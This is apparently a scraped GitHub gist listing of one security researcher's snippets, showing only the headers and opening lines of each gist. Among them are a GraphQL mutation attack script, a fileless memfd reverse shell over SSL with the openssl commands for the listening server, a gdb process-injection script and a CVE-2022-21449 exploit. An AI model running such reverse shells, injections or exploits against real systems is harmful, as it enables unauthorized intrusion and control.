dualfade
/ graphql mutation attack
Last active
August 19, 2023 01:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # gql_mutation_payload.py | |
| # @dualfade | |
| # NOTE: refs -- | |
| # https://dev.to/ivandotv/preventing-graphql-batching-attacks-56o3 | |
| # https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation | |
| # https://devinschulz.com/rename-fields-by-using-aliases-in-graphql/ | |
| """ |
dualfade
/ simulate typing to VDI --
Last active
May 18, 2023 21:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # shellcheck disable=SC2059 | |
| # simulate_typing.sh | |
| # #dualfade -- | |
| # ref -- | |
| # tldr xdotool; https://www.mankier.com/1/xdotool -- | |
| # tldr xclip; https://linux.die.net/man/1/xclip -- | |
| function vdi_clip2win() { |
dualfade
/ Gomuks; Remove "Empty Rooms"
Created
April 1, 2023 20:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gomuks v3.0.0 -- | |
| https://github.com/tulir/gomuks | |
| how to remove "Empty Room" in gomuks -- | |
| Do the following -- | |
| Ref: | |
| https://github.com/tulir/gomuks/issues/192#issuecomment-760003730 | |
| Log in to the chomium element web account |
dualfade
/ BurpSuiteSSLPassTrough.json
Last active
December 13, 2022 04:19
— forked from vsec7/BurpSuiteSSLPassTrough.json
Filter out the noise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "proxy": { | |
| "ssl_pass_through": { | |
| "automatically_add_entries_on_client_ssl_negotiation_failure": false, | |
| "rules": [ | |
| { | |
| "enabled": true, | |
| "host": ".*\\.google\\.com", | |
| "protocol": "any" | |
| }, |
dualfade
/ memfd_rssl_shell.py
Last active
November 23, 2022 01:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # memfd_rssl_shell.py | |
| # dualfade | |
| # memfd reverse shell over ssl -- | |
| # inspired by; https://0x00sec.org/t/super-stealthy-droppers/3715 -- | |
| # ex: server side -- | |
| # openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem | |
| # openssl s_server -quiet -key server.key -cert server.pem -port 8443 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| KCgrJ18memYyKjcYNQoYdysxN2IpJmJ4WBR2Y389KyZ7OXd9ChZlES4VWUUzPktEIhlEbFsiPSkgQXp_KzgiNCwZfCI1W1xXNiRocH1CIipkIT0gPDJ7MyJ4BQdhaXZkCHIfQys4aEV0cSg4F3sxOyB-NA== |
dualfade
/ memfd_create_rssl.rb
Created
November 20, 2022 22:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # typed: false | |
| # dualfade -- | |
| # memfd_create_rssl.rb -- | |
| # NOTE: from sorbet -- | |
| # https://sorbet.org/docs/adopting -- | |
| # gem 'sorbet-static-and-runtime' | |
| # gem 'tapioca', require: false, :group => :development |
dualfade
/ gdb proc inj --
Last active
October 28, 2022 23:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # gdb_process_injection.rb | |
| # dualfade -- | |
| # inspired by -- | |
| # https://bit.ly/3VSvWHX -- | |
| # testing -- | |
| # docker run -it --rm --cap-add CAP_SYS_PTRACE ubuntu bash |
dualfade
/ ArchLinux Vagrant; Libvirt wipeout; get your data
Last active
September 25, 2022 01:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Wiped out Vagrant / Libvirt image -- | |
| Save your Effing data -- | |
| Archlinux vagrant AUTO upgrade which toasted /boot/ | |
| initramfs-linux.img* initramfs-linux-fallback.img | |
| THIS DOOZEY DEFAULT ( Vagrantfile Entry ) -> | |
| # config.vm.box_check_update = false | |
| -> Ill definitely be enabling that hah. Do not upgrade until I say so ! |
dualfade
/ cve-2022-21449
Last active
August 7, 2023 14:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # cve-2022-21449 | |
| # dualfade -- | |
| # rewrite in ruby 3 -- | |
| # imports -- | |
| require 'bundler/inline' | |
| require 'ecdsa/signature' | |
| require 'ecdsa/format' |
NewerOlder